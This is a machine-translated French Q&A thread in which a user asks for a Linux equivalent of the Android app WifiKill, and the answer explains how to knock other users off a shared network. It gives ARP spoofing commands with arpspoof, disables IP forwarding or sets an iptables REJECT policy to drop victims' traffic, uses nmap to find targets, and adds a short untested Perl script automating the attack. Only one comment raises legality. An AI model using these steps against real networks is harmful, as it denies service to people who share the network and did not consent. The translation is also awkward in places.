Une application PC similaire à Wifikill sous Android [fermé]


-1

Existe-t-il un programme (de préférence Linux) similaire à l'application Android WifiKill?


3
Pour ceux d'entre nous qui n'ont pas de téléphone Android - que fait-il?
slhck

Si vous êtes connecté à un réseau Wi-Fi, vous pouvez utiliser cette application pour "couper" certaines personnes du réseau (elles seront toujours connectées à l'AP mais tous leurs paquets seront abandonnés)
user49740

plus de détails et plus d'effort de recherche s'il vous plaît
user 99572 is fine

1
Il convient de noter que le faire sur un point d'accès que vous ne possédez pas pourrait être considéré comme contraire aux Conditions d'utilisation et peut-être même illégal (je ne suis pas sûr de la légalité et de IANAL).
Bob

Réponses:


4

Eh bien, Android est Linux, donc vous pouvez reproduire les actions de ponury WifiKill sur votre ordinateur Linux

WifiKill fait deux choses:

  1. Il sert de passerelle pour que les victimes envoient des paquets au téléphone au lieu de les envoyer à la passerelle
  2. Il désactive le transfert de paquets. Par conséquent, les victimes enverront tous les paquets sur votre ordinateur qui les lâcheront.

Pour le masquage, vous avez besoin du spoofing ARP. Vous pouvez utiliser le arpspoof commande de dsniff :

  1. Tout d'abord, vous devez connaître l'adresse IP de la passerelle. Courir route -n dans un terminal et obtenez l'adresse IP de la passerelle à partir de là. Dans le cas le plus courant (vous êtes uniquement connecté au réseau sans fil), la passerelle serait l’entrée avec Destination. 0.0.0.0. Vous pouvez utiliser route -n|grep ^0.0.0.0|cut -d' ' -f 10 obtenir l'IP de la passerelle par défaut
  2. Ensuite, utilisez arpspoof se faire passer pour la passerelle. Courir arpspoof $IP en tant que root si vous voulez tuer tout le réseau sauf vous, ou exécuter arpspoof -t $VICTIM_IP $IP pour chaque victime si vous voulez tuer seulement certains hôtes

Maintenant, vous vous faites passer pour la passerelle du réseau. Tous les paquets envoyés par les victimes sont envoyés sur votre ordinateur. Vous devez maintenant désactiver le transfert de paquets. Pour faire cette course echo -n 0 > /proc/sys/net/ipv?/ip_forward en tant que racine. Cela laissera tomber tous les paquets envoyés par les victimes

Ça fait longtemps que je n'ai pas utilisé WifiKill, mais je me souviens qu’il y avait une option pour rejeter les paquets au lieu de les laisser tomber [le rejet donne aux gens une erreur de connexion instantanée, le fait de laisser toutes leurs connexions expirer]. Pour ce faire, vous devez:

  1. Activer transfert de paquets en cours d'exécution echo -n 1 > /proc/sys/net/ipv?/ip_forward comme racine
  2. Ensemble netfilter La politique FORWARD par défaut de REJECT. Courir iptables -P FORWARD REJECT. Bien sûr, vous pouvez utiliser iptables pour des règles de pare-feu arbitrairement complexes

WifiKill répertorie également les hôtes en ligne. Pour faire cela sous Linux, vous pouvez utiliser nmap faire un ping sur des hôtes dans une plage donnée. Par exemple, si vous voulez savoir quels hôtes sont en ligne dans la gamme 192.168.1.1 à 192.168.1.254 tu peux courir nmap -sP 192.168.1.1-254. Bien que cela ne répertorie pas les ordinateurs dotés de pare-feu «furtifs», vous pouvez toujours les tuer si vous tuez tout le monde sur le réseau ou si vous connaissez leur adresse IP exacte.

Il pourrait y avoir un programme là-bas faisant ce que j'ai énuméré ci-dessus, mais dans le cas le plus courant, vous pouvez écrire un script:

#!/usr/bin/perl -w
#This is untested code. Compiling works, but I haven't tested anything more
my $gw=`route -n|grep ^0.0.0.0|cut -d' ' -f 10`;
if (@ARGV) {
  print "arpspoof -t $_ $gw &" for (@ARGV);
} else {
  print "arpspoof $gw &";
}
system "echo 0 > $_" for(</proc/sys/net/ipv?/ip_forward>);

Enregistrer ceci sous kill.pl puis appelez-le comme ./kill.pl $IP1 $IP2 ... $IPn tuer $IP1, $IP2, ..., $IPn ou comme ./kill.pl tuer tous les hôtes


J'ai créé un script en bash, basé sur cette réponse: gist.github.com/FedericoPonzi/0d2210164b573b283cea
Federico Ponzi

En utilisant notre site, vous reconnaissez avoir lu et compris notre politique liée aux cookies et notre politique de confidentialité.
Licensed under cc by-sa 3.0 with attribution required.